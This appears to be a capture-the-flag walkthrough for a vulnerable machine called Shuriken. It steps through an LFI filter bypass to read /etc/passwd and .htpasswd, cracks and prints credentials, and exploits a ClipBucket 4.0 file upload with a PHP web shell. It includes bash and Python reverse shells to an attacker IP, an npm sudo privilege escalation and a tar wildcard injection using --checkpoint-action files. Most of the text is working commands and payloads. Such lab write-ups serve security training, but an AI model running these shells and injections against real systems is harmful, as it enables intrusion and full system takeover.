Starting with the Nmap scan we can see that there are two ports open. Web server hosted on port 80 and another one on port 8080 which is filtered.
The website looks fairly generic, you can navigate through sections and pages.
In the first part, we are supposed to enumerate through the javascript files to look for any useful information. There are two such files:
/js/index_7ed54732.js
/js/index_d8338055.js
I always start with one of the most common approaches which is to look for any links.
For this purpose, I will use linkfinder.
The script found two interesting links:
http://broadcast.shuriken.local
http://shuriken.local/index.php?referer=
The broadcast domain is secured with HTTP Basic Authorization which makes it unavailable to us.
In the second link, however, there is this referer query and it's actually vulnerable to basic LFI. It checks if the query contains "../" and gets rid of it. To bypass it typing in the query something like "..//" is enough. It accepts GET requests.
I will use curl for this purpose
curl --url http://shuriken.local/index.php?referer=..//..//..//..//etc/passwd
It will be outputted in the page source as well.
Since there exists a domain locked out with HTTP Authorization it has to means that there is .htpasswd file somewhere on the system. It's actually in a very common location which is /etc/apache2/.htpasswd
It's always a good practice to think about the file/information we are looking for. The website is hosted on the Apache2 web server. What is the apache2 directory structure? What are the rules? In order to secure the web page, we need to provide the full path to the .htpasswd file and this information is stored in the apache configuration file when you configure the domain. It's usually located in /etc/apache2/sites-enabled/000-default.conf and is readable by default. This reveals the full location of the .htpasswd file.
Requesting this file gives encoded credentials.
Supply them to john/hashcat
john hash.txt --wordlist=/etc/wordlists/rockyou.txt
username: developers
password: 9972761drmfsls
Now we can log in into broadcast.shuriken.local
It's a Clip Bucket instance used to share videos. It's easy to notice that the version used is 4.0 and apparently it has a publicly available exploit.
https://www.exploit-db.com/exploits/44250
It's a text document that describes 3 different techniques to exploit it. Only Arbitrary file upload works but that's enough to achieve RCE.
Prepare a php file with content like this:
<?php
system($_REQUEST['cmd']);
?>
Or pass reverse shell directly:
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/8888 0>&1'");
?>
Upload prepared file with the given exploit.
Remember to authorize with correct credentials
curl -F "file=@<file_name>" -F "plupload=1" -F "name=anyname.php" http://broadcast.shuriken.local/actions/photo_uploader.php -u developers:9972761drmfsls
Now locate where the file is stored.
In my case, it's http://broadcast.shuriken.local/files/photos/2020/10/05/ + randomly generated file name. It depends on date and timestamp.
Now open the file and gain shell access. I uploaded a file with cmd query argument for versatility.
Python reverse shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
This www-data account has special privileges over the npm binary for node.js packages management. It can be called as user server-management which is the less privileged account for system administration.
As you can recall there is port 8080 open. It's a node.js staging application inside the server. That would make sense that there exists an account with elevated privileges over the npm binary.
To escalate the privileges prepare an npm package with shellcode inside.
Initialize new package with npm init this will create file named package.json.
Alter the script directive:
{
"name": "tmp",
"version": "1.0.0",
"description": "",
"main": "index.js",
"scripts": {
"shell": "/bin/bash"
},
"author": "",
"license": "ISC"
}
Since nano doesn't work the fastest way is to upload such a file from your own machine.
It's possible to use curl for this.
Now install the package
sudo -u server-management npm install
Finally, execute the script
sudo -u server-management npm run-script shell
And this way the user is owned.
Now it's time for the root part.
Looking into the crontab reveals that there is a job running every 2 minutes. It's a backup script.
It opens /home/server-management/Documents directory and creates a backup of it using wildcard(*) tar argument.
Such construction is vulnerable to wildcard injection.
To exploit it first create a shell file inside /home/server-management/Documents directory containing a reverse shell.
echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.33\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" > shell.sh
Next create a --checkpoint-action for this file
echo "" > "--checkpoint-action=exec=sh shell.sh"
then create
echo "" > --checkpoint=1
When the script will execute a connection to the Netcat listener will be returned.
And that's the root access.
Top comments (0)